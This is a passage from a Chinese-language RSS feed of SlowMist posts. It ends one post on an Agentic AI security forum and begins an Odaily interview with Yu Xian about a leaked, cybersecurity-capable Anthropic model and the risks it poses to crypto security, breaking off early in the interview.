style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">首届 Agentic AI 创新与安全论坛不仅汇聚了行业顶尖力量，也为 AI Agent 安全提供了前瞻性思路。随着 Agentic AI 与 Web3 的深度融合，安全挑战将持续升级。作为全球领先的区块链安全公司，慢雾(SlowMist) 将继续推动系统化安全治理落地，通过 ADSS、开源工具与实践，为 AI Agent 构建内生安全能力，助力行业在创新浪潮中实现安全可控、可持续发展。</span></span></h2></b></b></b></p><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div style="padding-right: 10px;padding-left: 10px;font-size: 15px;line-height: 2;"><div style="letter-spacing: 0.544px;font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: left;"><div style="display: inline-block;width: 657.014px;vertical-align: top;border-bottom: 1px dashed rgb(160, 160, 160);border-bottom-right-radius: 0px;border-right: 1px dashed rgb(160, 160, 160);border-top-right-radius: 0px;border-left-width: 0px;"><div powered-by="xiumi.us"><div style="padding-right: 10px;padding-left: 10px;display: inline-block;border-style: solid;border-width: 1px 0px 0px 10px;box-shadow: rgb(0, 0, 0) 0px 0px 0px;border-color: rgb(54, 53, 53);border-radius: 0px;width: 629.769px;"><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">往期回顾</span></strong></span></p></div></div><div powered-by="xiumi.us"><div style="text-align: center;"><div style="padding: 10px 20px;display: inline-block;width: 656.019px;vertical-align: top;"><div style="margin-top: 8px;margin-bottom: 8px;"><div style="font-size: 14px;color: rgb(62, 62, 62);text-align: left;"><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504594&amp;idx=1&amp;sn=88d0a2ea27ea5f4bd87967e3411848f6&amp;scene=21#wechat_redirect" textvalue="Odaily专访余弦：Anthropic核弹级新模型泄漏，如何影响加密安全攻防？" data-itemshowtype="11" linktype="text" data-linktype="2">Odaily专访余弦：Anthropic核弹级新模型泄漏，如何影响加密安全攻防？</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504592&amp;idx=1&amp;sn=5b14e6284530b087155c3c9b13b86e3c&amp;scene=21#wechat_redirect" textvalue="慢雾：Web3 安全年框服务全面升级" data-itemshowtype="0" linktype="text" data-linktype="2">慢雾：Web3 安全年框服务全面升级</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504575&amp;idx=1&amp;sn=fa2ad5b1d103daaa52b67a16aa6fcef8&amp;scene=21#wechat_redirect" textvalue="安全预警：Apifox 桌面客户端官方 CDN 脚本遭供应链投毒" data-itemshowtype="0" linktype="text" data-linktype="2">安全预警：Apifox 桌面客户端官方 CDN 脚本遭供应链投毒</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504575&amp;idx=2&amp;sn=0602625406cc37b3c62e48b13ce706dd&amp;scene=21#wechat_redirect" textvalue="LiteLLM 供应链攻击事件始末" data-itemshowtype="0" linktype="text" data-linktype="2">LiteLLM 供应链攻击事件始末</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504542&amp;idx=1&amp;sn=877bb46e71ffb4b97ef69748773ee304&amp;scene=21#wechat_redirect" textvalue="SlowMist Agent Security Skill 正式发布，守护 AI Agent 每一道防线" data-itemshowtype="0" linktype="text" data-linktype="2">SlowMist Agent Security Skill 正式发布，守护 AI Agent 每一道防线</a></span></p></div></div></div></div></div></div></div></div></div></div><p style="white-space: normal;text-align: center;margin-bottom: 0px;" nodeleaf=""><img data-aistatus="1" class="rich_pages js_insertlocalimg wxw-img" data-ratio="3.9814814814814814" data-s="300,640" data-type="png" data-w="1080" style="letter-spacing: 0.578px;text-align: center;white-space: normal;width: 558px;pointer-events: initial;" data-cropselx1="0" data-cropselx2="578" data-cropsely1="0" data-cropsely2="1973" data-fileid="100009827" src="https://wechat2rss.xlab.app/img-proxy/?k=81074fc1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FqsQ2ibEw5pLbEP8f4tadFenoLauzHpicWdWbVap3aia38LUGPflBho9ibDHXjoG5fecGJSaYa4S4zYdoicXibSmjv9tg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div powered-by="xiumi.us" style="padding-right: 10px;padding-left: 10px;font-size: 15px;line-height: 2;"><div style="font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: center;"><div style="padding: 10px;display: inline-block;width: 609.282px;border-width: 1px;border-style: solid;border-color: rgb(192, 200, 209);background-color: rgb(239, 239, 239);"><div><div style="font-size: 14px;line-height: 1.2;"><p><span style="color: rgb(0, 0, 0);"><strong><span style="font-size: 16px;"><span leaf="">慢雾导航</span></span></strong></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾科技官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://www.slowmist.com/" target="_blank">https://www.slowmist.com/</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾区官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://slowmist.io/" target="_blank">https://slowmist.io/</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾 GitHub</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://github.com/slowmist" target="_blank">https://github.com/slowmist</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Telegram</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.me/slowmistteam" target="_blank">https://t.me/slowmistteam</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Twitter</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://twitter.com/@slowmist_team" target="_blank">https://twitter.com/@slowmist_team</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Medium</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://medium.com/@slowmist" target="_blank">https://medium.com/@slowmist</a></span></span></em></span></p><p style="letter-spacing: 0.544px;"><span style="color: rgb(0, 0, 0);"><strong><span leaf="">知识星球</span></strong></span></p><p style="letter-spacing: 0.544px;"><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.zsxq.com/Q3zNvvF" target="_blank">https://t.zsxq.com/Q3zNvvF</a></span></span></em></span></p></div></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=a5413f4a&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU4ODQ3NTM2OA%3D%3D%26mid%3D2247504607%26idx%3D1%26sn%3D49e70d092b5e2e4d7278e85d822643f8">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 01 Apr 2026 16:15:00 +0800</pubDate>
    </item>
    <item>
      <title>Odaily专访余弦：Anthropic核弹级新模型泄漏，如何影响加密安全攻防？</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504594&amp;idx=1&amp;sn=88d0a2ea27ea5f4bd87967e3411848f6</link>
      <description>“AI威胁”并不是未来时，而是现在进行时。</description>
      <content:encoded><![CDATA[<p><span>Azuma</span> <span>2026-03-30 18:52</span> <span style="display: inline-block;">中国香港</span></p>




  <p>以下文章来源于：Odaily</p>
  <strong>Odaily</strong>
  <p>Odaily是亚太地区领先的Web3.0行业内容平台，并与36Kr达成独家战略合作，专注区块链技术、加密资产、去中心化协议等前沿领域的新闻资讯、深度解读、行业研究等内容生产，并致力于服务行业头部企业，提供整合营销服务。</p>



  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=cc2cccd2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FzmwON8smU6plOibxBEIfSg1KvOqiavKXIa8ne1QULtrdeqQG2Rt9E0nWK3ZoPtnvC9Wsc5dYOBAY7rUWhLzrssBaqUG5Zq6AwOXoSewF2pzvY%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <p style="white-space: normal;margin-bottom: 0px;line-height: 1.6em;"><span leaf=""><img data-aistatus="1" class="rich_pages __bg_gif wxw-img" data-ratio="0.22820037105751392" data-s="300,640" data-type="gif" data-w="1078" style="font-family: -apple-system-font, system-ui, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;text-align: center;width: 578px;height: 132px;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible !important;" data-cropselx1="0" data-cropselx2="578" data-cropsely1="0" data-cropsely2="133" data-backw="556" data-backh="134" src="https://wechat2rss.xlab.app/img-proxy/?k=6508da76&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FctMhTnwNdoew6gT0icDq3OEn9Srh4ww6RvBtjc0YjPvf5CWA8NxcE3qqhQX0fFXeDLNmOQa1Ldlia7O4Vg3ckhKQ%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></span></p><p style="white-space: normal;margin-bottom: 0px;"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-croporisrc="https://mmbiz.qpic.cn/sz_mmbiz_jpg/zmwON8smU6oxXhH8aKolxOwnY3GIel9ZQNZfQN8pcuS5tD6wWIK297WSFicu8Mf7JDibWWkrwffANGAcOSsicOZLvia9uY85AsrEu9Wy27UtEJM/640?wx_fmt=webp&amp;from=appmsg" data-cropx2="1067.076923076923" data-cropy2="657.2307692307693" data-imgfileid="100020941" data-ratio="0.6157450796626054" data-s="300,640" style="height:356px;font-family:-apple-system-font, system-ui, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing:0.544px;text-align:center;width:578px;box-sizing:border-box !important;overflow-wrap:break-word !important;visibility:visible !important;" data-type="webp" data-w="1067" src="https://wechat2rss.xlab.app/img-proxy/?k=313e93fc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FzmwON8smU6qic499A7Ycqc0oC8ocIiad8Em7Gx7U08BBYor8OF5lzpTskxk3CL3bXC3z2d5yBUzMpK3PCtTt13wicZx3wdiakZibwz5FgJhZ9gII%2F640%3Fwx_fmt%3Djpeg"/></span></p><div style="margin-right: 0em;margin-left: 0em;padding: 0.5em 1em;white-space: normal;max-width: 100%;letter-spacing: 0.544px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;border-style: none;background-color: rgb(235, 235, 235);box-sizing: border-box !important;overflow-wrap: break-word !important;margin-bottom: 0px;"><p style="max-width: 100%;line-height: 1.75em;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 14px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;color: rgb(136, 136, 136);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;text-align: start;box-sizing: border-box !important;overflow-wrap: break-word !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;caret-color: rgb(115, 115, 115);color: rgb(115, 115, 115);font-family: &#34;PingFang SC&#34;, &#34;Lantinghei SC&#34;, &#34;Helvetica Neue&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="text-size-adjust: auto;"><span leaf="">“AI威胁”并不是未来时，而是现在进行时。</span></span></span></strong></span></span></p></div><p style="margin-right: 16px;margin-left: 16px;white-space: normal;max-width: 100%;min-height: 1em;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75em;box-sizing: border-box !important;overflow-wrap: break-word !important;margin-bottom: 0px;"><strong style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;color: rgb(136, 136, 136);font-size: 12px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span leaf="">作者：Azuma；编辑：郝方舟</span></span></strong></p><p style="margin-right: 16px;margin-left: 16px;white-space: normal;max-width: 100%;min-height: 1em;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75em;box-sizing: border-box !important;overflow-wrap: break-word !important;margin-bottom: 0px;"><strong style="max-width: 100%;letter-spacing: 0.544px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;color: rgb(136, 136, 136);font-size: 12px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><strong style="max-width: 100%;letter-spacing: 0.544px;text-align: left;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span leaf="">出品 </span><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span leaf="">| </span></strong></span></strong></span></strong></span></strong></span></strong></span></strong><strong style="max-width: 100%;letter-spacing: 0.544px;text-align: left;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;color: rgb(136, 136, 136);font-size: 12px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span leaf="">Odaily星球日报（ID：o-daily）</span></span></strong></p><p style="margin-right: 16px;margin-bottom: 16px;margin-left: 16px;text-wrap: wrap;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);font-size: 16px;font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;" data-pm-slice="0 0 []"><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">一起意外的数据泄露事件，让世界提前知道了 Anthropic 接下来将要发布的核弹级产品。</span></p><p style="margin-right: 16px;margin-bottom: 16px;margin-left: 16px;text-wrap: wrap;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);font-size: 16px;font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;"><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">《财富》上周四报道表示，Claude 背后的 AI 开发公司 Anthropic 正在训练了一款名为 Mythos 的新模型（内部代号疑似为 Capybara），而该公司在内部将其描述为“迄今为止所开发的最强大的 AI 模型”。审查过相关材料的网络安全研究人员透露，该模型是在一篇遗留在未受保护、可公开搜索的数据缓存中的博客文章草稿（现已不可访问）中发现的，而 Anthropic 则在《财富》询问之后证实了该模型的存在。</span></p><p style="margin-right: 16px;margin-bottom: 16px;margin-left: 16px;text-wrap: wrap;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);font-size: 16px;font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;"><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">Anthropic 方面将 Capybara 描述为一个新的模型层级，相较于 Claude 当前最强大的模型层级 Opus 4.6，Capybara 在软件编码、学术推理和网络安全等测试中得分大幅提高。</span></p><p style="margin-right: 16px;margin-bottom: 16px;margin-left: 16px;text-wrap: wrap;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);font-size: 16px;font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;"><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">早在去年 12 月，Anthropic 便曾做过一场利用 AI 去自主攻击加密货币智能合约的测试，结果证明了可盈利、可复用的 AI 自</span><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">主攻击在技术上已然可行 —— 详见《成功模拟盗窃460万美元，AI已经学会自主攻击智能合约了》(</span><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);"><a href="https://www.odaily.news/zh-CN/post/5207914" target="_blank">https://www.odaily.news/zh-CN/post/5207914</a></span><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">)。</span></p><p style="margin-right: 16px;margin-bottom: 16px;margin-left: 16px;text-wrap: wrap;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);font-size: 16px;font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;"><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">如今，随着更强大且有着网络安全特化能力的新模型问世，加密货币的安全攻防形势将会出现哪些变化？为了更透彻地解答这些问题，Odaily 星球日报特意邀请到了业界安全专家、慢雾创始人余弦（X：@evilcos）来为大家解惑。</span></p><p style="margin-right: 16px;margin-bottom: 16px;margin-left: 16px;white-space: normal;max-width: 100%;min-height: 1em;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);font-size: 16px;font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="letter-spacing: 0.544px;color: rgb(73, 73, 73);font-size: 15px;text-align: start;caret-color: rgb(73, 73, 73);"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.0962962962962963" data-type="png" data-w="1080" style="font-size: 16px;letter-spacing: 0.544px;text-align: center;width: 550px;height: 53px;" data-cropselx1="0" data-cropselx2="546" data-cropsely1="0" data-cropsely2="53" src="https://wechat2rss.xlab.app/img-proxy/?k=53a89e02&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FctMhTnwNdoew6gT0icDq3OEn9Srh4ww6RROo4fLzGQhdthObCvEKYrb32Aay9Xa8JJuZcibMpnd8tbcZibaG6whIA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><h2 style="margin-right: 16px;margin-bottom: 16px;margin-left: 16px;white-space: normal;max-width: 100%;min-height: 1em;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);font-size: 16px;font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;text-align: center;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span leaf="" style="letter-spacing: 0.544px;caret-color: rgb(73, 73, 73);color: rgb(85, 148, 45);font-weight: bold;font-size: 16px;text-align: center;">AI 的安全威胁，比你想象中来得更快</span></h2><p style="margin-right: 16px;margin-bottom: 16px;margin-left: 16px;text-wrap: wrap;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);font-size: 16px;font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;"><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">在对话的一开始，余弦便直接表示，</span><strong><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">业内的许多人还在把 AI 的安全威胁视作“未来时”，但现实进度可能会比行业想象得更快一些 —— AI 对加密安全的影响，不是即将到来，而是早已开始发生。</span></strong><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">在他看来，AI 对于加密货币安全的影响路径主要有两大类。</span></p><p style="margin-right: 16px;margin-bottom: 16px;margin-left: 16px;text-wrap: wrap;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);font-size: 16px;font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, 